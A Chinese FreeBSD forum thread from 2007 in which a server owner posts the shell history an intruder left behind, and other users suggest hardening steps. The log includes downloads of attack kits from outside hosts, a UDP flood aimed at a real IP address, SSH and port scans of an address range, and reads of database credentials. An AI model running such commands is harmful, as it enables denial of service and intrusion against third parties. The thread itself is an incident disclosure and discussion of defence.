服务器被黑了，贴部分历史纪录

suek

别人给装的系统FreeBSD6.2，密码太简单了（以前装的RHEL就被黑了，密码他们还没有改），我登陆上去时已经被人早就登陆了。
看了一下系统，给装了好几个软件，还有攻击的脚本。下面是部分历史纪录
who
reboot
ls
cd kits
ls
who
wall boo
w
w
ls
./spike.sh
perl spike.sh
perl udp.pl 89.38.201.240 80 0
uptime
w
who
w
ifconfig
cat /etc/hosts
free -m
who
mc
ls
cat spike.sh
ls
nano udppl
ls
tail
clear
cat /etc/hosdts
cat /etc/hosts
mysql
mysql -u root -p
cd /etc/verlihub
ls
cat dbconfig
tail dbconfig
mysql -u root -p
cd/home/kits
cd
ls
cd kits
ls
wget greet.host.sk/alecs.tgz
wget greet.host.sk/alecs.tgz
wget puricel.xhost.ro/ffa.tgz
wget help-bnc.sufx.net/fld.tar
wget ftp://ftp.vasili.ro/ftproot/fld.tar
tar zxvf fld.tar
ls
rm -rf fld.tar
cd fld
ls
cat v
clear
ls
./v
./j
./s
./sl
./std
perl udp.pl
perl j
perl std
cd ..
ls
wget rotz3p.evonet.ro/verli_pack.tar.gz
ls
rm -rf 404.html
wget rotz3p.evonet.ro/verli_pack.tar.gz
rm -rf 404.html
wget -m ftp://ftp.vasili.ro/ftproot/verli_pack
ls
rm -rf ftp.vasili.ro
wget ftp://ftp.vasili.ro/ftproot/verli_pack.tar.gz
tar zxvf verli_pack.tar.gz
ls
rm -rf verli_pack.tar.gz
cd verli_pack/
ls
tar zxvf floodprot.tar.gz
tar zxvf iplog.tar.gz
ls
lua-5.0.2.tar.gz
tar zxvf lua-5.0.2.tar.gz
ls
cd
ls
cd verlid
ls
cd verlihub
ls
cd plugins/
cd /kits
cd kits
cd /home/kits
cd /root/kits
cd /verlid
cd
cd verlid/verlihub
ls
cd plugins/
cp /root/kits/verli_pack/iplog /root/verlid/verlihub/plugins/
cp /root/kits/verli_pack/iplog.tar.gz /root/verlid/verlihub/plugins/
ls
cp /root/kits/verli_pack/floodprot.tar.gz /root/verlid/verlihub/plugins/
cp /root/kits/verli_pack/lua-5.0.2.tar.gz /root/verlid/verlihub/plugins/
ls
tar zxvf lua-5.0.2.tar.gz
tar zxvf iplog.tar.gz
ls
tar zxvf floodprot.tar.gz
ls
rm -rg iplog.tar.gz
rm -rf iplog.tar.gz
rm -rf floodprot.tar.gz
rm -rf lua-5.0.2.tar.gz
ls
cd iplog
./configure && make && make install
cd ..
cd floodprot/
./configure && make && make install
cd ..
cd lua-5.0.2/
./configure && make && make install
locate liblua
cd /usr/local/lib
ls
VERLIHUB_CFG=/etc/verlihub ulimit -n 10240 && VERLIHUB_CFG=/etc/verlihub vh_runhub
cd /etc/verlihub
ls
ulimit -n 10240
vh_runhub
/usr/local/bin/vh_runhub
cd /root/verlid
ls
cd verlihub
ls
ulimit -n 10240
vh_runhub
cd /usr/local/lib
ls
cd /root/verlid/verlihub
cd scripts/
vh_install
./vh_install
tracert www.yahoo.com
w
who
w
who
w
free -m
top
w
cat /var/mail/root
cd /var/www
cd /etc/httpd
who
cd
cd kits
ls
cd fld
ls
cd ..
wget http://greet.host.sk/alex.tgz
ls
cd ssteam
ls
perl start pscan2 222.134
perl pscan2 222.134
perl pscan2.pl 222.134
./go.sh
chmod 777 go.sh
./go.sh
chmod +x go.sh
./go.sh
./ssh-scan
chmod 777 ssh-scan
./ssh-scan
ls
./ss
chmod +x ss
./ss
w
/usr/local/bin/bash vh_restart /usr/local/bin/verlihub > /etc/verlihub/log &
who

[ 本帖最后由 suek 于 2007-3-29 11:53 编辑 ]

HonestQiao

晕，被黑过了还不吸取教训啊？

作个最简单的吧，开启防火墙 http://www.freebsd.org/doc/zh_CN ... firewalls-ipfw.html

这个你贴出来，我们也不能给你多少帮助。
但是第一条，加强密码。

suek

嗯。我吃饭前已经把密码验证关了，改成public key验证了。
吃过饭看一下，他既然又来了。。。
#who
root             ttyp1    Mar 29 12:13 (77.81.213.124)
现在我已经开了ipfw防火墙了（把另一个服务器上的规则复制了过去），把root远程登录的权限去掉了。
10040 allow tcp from 我的IP段 to me dst-port 22 in

[ 本帖最后由 suek 于 2007-3-29 13:23 编辑 ]

assiss

root远程登陆，MY GOD。

zhengwei_zw

好牛的人啊，是哪个高手黑你的啊？强！！！不用root远程登陆怎么办啊？
那用wheel么？

demy168

知道是怎么被黑的吗？是漏洞？还是直接破的root密码？

HonestQiao

原帖由 suek 于 2007-3-29 13:16 发表
嗯。我吃饭前已经把密码验证关了，改成public key验证了。
吃过饭看一下，他既然又来了。。。
#who
root             ttyp1    Mar 29 12:13 (77.81.213.124)
现在我已经开了ipfw防火墙了（把另一个服务器上的 ...

public key这个他都可以进来？
你自己的电脑先被人黑了么？

bGFuZ3Vl

.

使用密码验证也没什么不好，别人要扫描也无大碍，最多给日志添几条记录吧。密码一定要难以猜测，比如

BiaUyk091IHftu
hIUOy965pUI78

这样大小写、数字搭配的。甚至可以带上符号：

[P6w$dg;SmR1tL
0&`YtweP'5tFWd

当然，这些都只是普通民用的安全策略。不难想象，军事、国防等领域的安全策略就更为复杂了。

.

george_young

SSH的密码和public key登陆都开了？